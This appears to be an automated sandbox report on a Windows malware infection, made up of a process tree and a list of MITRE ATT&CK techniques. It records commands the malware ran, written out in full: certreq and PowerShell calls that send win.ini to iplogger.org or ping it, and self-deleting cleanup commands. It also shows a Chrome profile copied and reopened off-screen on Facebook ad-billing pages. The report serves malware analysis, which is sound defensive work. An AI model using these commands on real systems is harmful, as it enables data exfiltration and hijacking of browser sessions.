"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd8,0xdc,0xe0,0xb4,0xe4,0x26e59a16e00,0x26e59a16e10,0x26e59a16e20
11⤵
PID:14340

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1624,11274747371297865085,8871976224139658587,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2248 /prefetch:8
11⤵
PID:20016

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,11274747371297865085,8871976224139658587,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1684 /prefetch:8
11⤵
PID:15672

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,11274747371297865085,8871976224139658587,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1636 /prefetch:2
11⤵
PID:7356

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,11274747371297865085,8871976224139658587,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2824 /prefetch:1
11⤵
PID:14864

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,11274747371297865085,8871976224139658587,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2804 /prefetch:1
11⤵
PID:18024

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,11274747371297865085,8871976224139658587,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3052 /prefetch:1
11⤵
PID:12752

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,11274747371297865085,8871976224139658587,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
11⤵
PID:17496

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,11274747371297865085,8871976224139658587,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3640 /prefetch:1
11⤵
PID:16692

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,11274747371297865085,8871976224139658587,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1
11⤵
PID:17200

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,11274747371297865085,8871976224139658587,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1
11⤵
PID:10212

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,11274747371297865085,8871976224139658587,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4720 /prefetch:1
11⤵
PID:15968

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,11274747371297865085,8871976224139658587,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:1
11⤵
PID:17112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,11274747371297865085,8871976224139658587,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:1
11⤵
PID:18836

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,11274747371297865085,8871976224139658587,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
11⤵
PID:7816

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,11274747371297865085,8871976224139658587,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=652 /prefetch:8
11⤵
PID:14768

C:\Users\Admin\AppData\Local\Temp\pwpv0ifxdjm\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\pwpv0ifxdjm\chashepro3.exe" /VERYSILENT
9⤵
PID:19296

C:\Users\Admin\AppData\Local\Temp\is-IS969.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-IS969.tmp\chashepro3.tmp" /SL5="$60564,1478410,58368,C:\Users\Admin\AppData\Local\Temp\pwpv0ifxdjm\chashepro3.exe" /VERYSILENT
10⤵
PID:19400

C:\Program Files (x86)\JCleaner\mex.exe
"C:\Program Files (x86)\JCleaner\mex.exe"
11⤵
PID:19668

C:\Program Files (x86)\JCleaner\mex.exe
"{path}"
12⤵
PID:9492

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Program Files (x86)\JCleaner\mex.exe"
13⤵
PID:13916

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
14⤵
- Delays execution with timeout.exe
PID:14084

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
11⤵
PID:19652

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1EaGq7"
11⤵
PID:19636

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
11⤵
PID:19628

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
12⤵
PID:11056

C:\Program Files (x86)\JCleaner\Venita.exe
"C:\Program Files (x86)\JCleaner\Venita.exe"
11⤵
PID:19620

C:\Program Files (x86)\JCleaner\Venita.exe
"{path}"
12⤵
PID:13092

C:\Program Files (x86)\JCleaner\Brava.exe
"C:\Program Files (x86)\JCleaner\Brava.exe"
11⤵
PID:19612

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
11⤵
PID:19604

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1aSny7"
11⤵
PID:19596

C:\Users\Admin\AppData\Local\Temp\zjfedykte3u\tdiu21k4dgm.exe
"C:\Users\Admin\AppData\Local\Temp\zjfedykte3u\tdiu21k4dgm.exe" /ustwo INSTALL
9⤵
PID:19384

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "tdiu21k4dgm.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\zjfedykte3u\tdiu21k4dgm.exe" & exit
10⤵
PID:7252

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "tdiu21k4dgm.exe" /f
11⤵
- Kills process with taskkill
PID:8664

C:\Users\Admin\AppData\Local\Temp\5qs5arq5pol\vict.exe
"C:\Users\Admin\AppData\Local\Temp\5qs5arq5pol\vict.exe" /VERYSILENT /id=535
9⤵
PID:16036

C:\Users\Admin\AppData\Local\Temp\is-G544N.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-G544N.tmp\vict.tmp" /SL5="$E0762,870426,780800,C:\Users\Admin\AppData\Local\Temp\5qs5arq5pol\vict.exe" /VERYSILENT /id=535
10⤵
PID:11860

C:\Users\Admin\AppData\Local\Temp\is-MF4PS.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-MF4PS.tmp\wimapi.exe" 535
11⤵
PID:10044

C:\Users\Admin\AppData\Local\Temp\srr3unsyuse\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\srr3unsyuse\Setup3310.exe" /Verysilent /subid=577
9⤵
PID:7232

C:\Users\Admin\AppData\Local\Temp\is-SDFDI.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SDFDI.tmp\Setup3310.tmp" /SL5="$40B1E,802346,56832,C:\Users\Admin\AppData\Local\Temp\srr3unsyuse\Setup3310.exe" /Verysilent /subid=577
10⤵
PID:11268

C:\Users\Admin\AppData\Local\Temp\is-DRAA6.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-DRAA6.tmp\Setup.exe" /Verysilent
11⤵
PID:9660

C:\Users\Admin\AppData\Local\Temp\is-V0GNN.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-V0GNN.tmp\Setup.tmp" /SL5="$50C2E,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-DRAA6.tmp\Setup.exe" /Verysilent
12⤵
PID:17940

C:\Users\Admin\AppData\Local\Temp\is-6QJ9P.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-6QJ9P.tmp\PictureLAb.exe" /Verysilent
13⤵
PID:17644

C:\Users\Admin\AppData\Local\Temp\is-QKOPH.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QKOPH.tmp\PictureLAb.tmp" /SL5="$D04D2,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-6QJ9P.tmp\PictureLAb.exe" /Verysilent
14⤵
PID:7988

C:\Users\Admin\AppData\Local\Temp\is-SR7A4.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-SR7A4.tmp\Setup.exe" /VERYSILENT
15⤵
PID:14564

C:\Users\Admin\AppData\Local\Temp\is-DPUUM.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DPUUM.tmp\Setup.tmp" /SL5="$30D12,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-SR7A4.tmp\Setup.exe" /VERYSILENT
16⤵
PID:3388

C:\Users\Admin\AppData\Local\Temp\is-R3Q23.tmp\def.exe
"C:\Users\Admin\AppData\Local\Temp\is-R3Q23.tmp\def.exe" /S /UID=lab214
17⤵
PID:19140

C:\Users\Admin\AppData\Local\Temp\is-6QJ9P.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-6QJ9P.tmp\Delta.exe" /Verysilent
13⤵
PID:6104

C:\Users\Admin\AppData\Local\Temp\is-41P8A.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-41P8A.tmp\Delta.tmp" /SL5="$E04D2,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-6QJ9P.tmp\Delta.exe" /Verysilent
14⤵
PID:8556

C:\Users\Admin\AppData\Local\Temp\is-8L91H.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-8L91H.tmp\Setup.exe" /VERYSILENT
15⤵
PID:18000

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-8L91H.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
16⤵
PID:20472

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
17⤵
- Kills process with taskkill
PID:12600

C:\Users\Admin\AppData\Local\Temp\is-6QJ9P.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-6QJ9P.tmp\zznote.exe" /Verysilent
13⤵
PID:8228

C:\Users\Admin\AppData\Local\Temp\is-VOLNM.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VOLNM.tmp\zznote.tmp" /SL5="$F04D2,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-6QJ9P.tmp\zznote.exe" /Verysilent
14⤵
PID:17212

C:\Users\Admin\AppData\Local\Temp\is-II9CF.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-II9CF.tmp\jg4_4jaa.exe" /silent
15⤵
PID:15168

C:\Users\Admin\AppData\Local\Temp\lqgcdk5qc2q\p34bs0lctmx.exe
"C:\Users\Admin\AppData\Local\Temp\lqgcdk5qc2q\p34bs0lctmx.exe" /ustwo INSTALL
9⤵
PID:10164

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "p34bs0lctmx.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\lqgcdk5qc2q\p34bs0lctmx.exe" & exit
10⤵
PID:15872

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "p34bs0lctmx.exe" /f
11⤵
- Kills process with taskkill
PID:10204

C:\Users\Admin\AppData\Local\Temp\p210nzgavjs\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\p210nzgavjs\askinstall24.exe"
9⤵
PID:16900

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
10⤵
PID:15216

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
11⤵
- Kills process with taskkill
PID:14944

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y
10⤵
PID:9476

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
10⤵
PID:2700

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x1a499c76e00,0x1a499c76e10,0x1a499c76e20
11⤵
PID:19444

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1664,2811003162668242753,1063336605380569574,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1672 /prefetch:8
11⤵
PID:12456

C:\Users\Admin\AppData\Local\Temp\k2z2wveyuoz\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\k2z2wveyuoz\chashepro3.exe" /VERYSILENT
9⤵
PID:9036

C:\Users\Admin\AppData\Local\Temp\is-KL8K1.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KL8K1.tmp\chashepro3.tmp" /SL5="$F03F6,1478410,58368,C:\Users\Admin\AppData\Local\Temp\k2z2wveyuoz\chashepro3.exe" /VERYSILENT
10⤵
PID:13424

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7744

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7892

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7132

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6400

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:4552

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{65afaf3f-cb77-5747-8b09-ab7626d8b053}\oemvista.inf" "9" "4d14a44ff" "0000000000000168" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"
2⤵
PID:6692

C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000160"
2⤵
PID:5972

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:4320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:7900

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:5292

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:8172

C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
2⤵
PID:14656

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6376

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7496

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:11412

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:18784

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:1796

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:8200

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:10448

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:12652

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 12652 -s 1476
2⤵
- Program crash
PID:9656

C:\Users\Admin\AppData\Roaming\wavthjw
C:\Users\Admin\AppData\Roaming\wavthjw
1⤵
PID:20300

C:\Users\Admin\AppData\Roaming\wavthjw
C:\Users\Admin\AppData\Roaming\wavthjw
2⤵
PID:13876

C:\Users\Admin\AppData\Local\Temp\456D.tmp.exe
C:\Users\Admin\AppData\Local\Temp\456D.tmp.exe
1⤵
PID:10740

C:\Users\Admin\AppData\Local\Temp\65A8.tmp.exe
C:\Users\Admin\AppData\Local\Temp\65A8.tmp.exe
1⤵
PID:13144

C:\Users\Admin\AppData\Local\Temp\7420.tmp.exe
C:\Users\Admin\AppData\Local\Temp\7420.tmp.exe
1⤵
PID:19832

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:1792

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:15776

C:\Users\Admin\AppData\Local\Temp\A488.tmp.exe
C:\Users\Admin\AppData\Local\Temp\A488.tmp.exe
1⤵
PID:16584

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:18496

C:\Users\Admin\AppData\Local\Temp\BB9B.tmp.exe
C:\Users\Admin\AppData\Local\Temp\BB9B.tmp.exe
1⤵
PID:11516

C:\Users\Admin\AppData\Local\Temp\C32E.tmp.exe
C:\Users\Admin\AppData\Local\Temp\C32E.tmp.exe
1⤵
PID:8588

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:11404

C:\Users\Admin\AppData\Local\Temp\DCB2.tmp.exe
C:\Users\Admin\AppData\Local\Temp\DCB2.tmp.exe
1⤵
PID:18352

C:\Users\Admin\AppData\Local\Temp\1461074104.exe
"C:\Users\Admin\AppData\Local\Temp\1461074104.exe"
2⤵
PID:20328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 20328 -s 272
3⤵
- Program crash
PID:8996

C:\Users\Admin\AppData\Local\Temp\1074905031.exe
"C:\Users\Admin\AppData\Local\Temp\1074905031.exe"
2⤵
PID:13020

C:\Users\Admin\AppData\Local\Temp\EC63.tmp.exe
C:\Users\Admin\AppData\Local\Temp\EC63.tmp.exe
1⤵
PID:10368

C:\Users\Admin\AppData\Local\Temp\FBD5.tmp.exe
C:\Users\Admin\AppData\Local\Temp\FBD5.tmp.exe
1⤵
PID:10944

C:\Users\Admin\AppData\Local\Temp\F10.tmp.exe
C:\Users\Admin\AppData\Local\Temp\F10.tmp.exe
1⤵
PID:5456

C:\Users\Admin\AppData\Local\Temp\1AD8.tmp.exe
C:\Users\Admin\AppData\Local\Temp\1AD8.tmp.exe
1⤵
PID:19068

C:\Users\Admin\AppData\Local\Temp\26FF.tmp.exe
C:\Users\Admin\AppData\Local\Temp\26FF.tmp.exe
1⤵
PID:18424

C:\Users\Admin\AppData\Local\Temp\26FF.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\26FF.tmp.exe"
2⤵
PID:64

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:9188

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:7844

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4856

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:17440

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:12584

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:16076

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:18684

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:11640

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:10724

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

New Service

T1050

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Bootkit

T1067

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Software Discovery

T1518

Query Registry

Virtualization/Sandbox Evasion

T1497

Security Software Discovery

T1063

System Information Discovery

Peripheral Device Discovery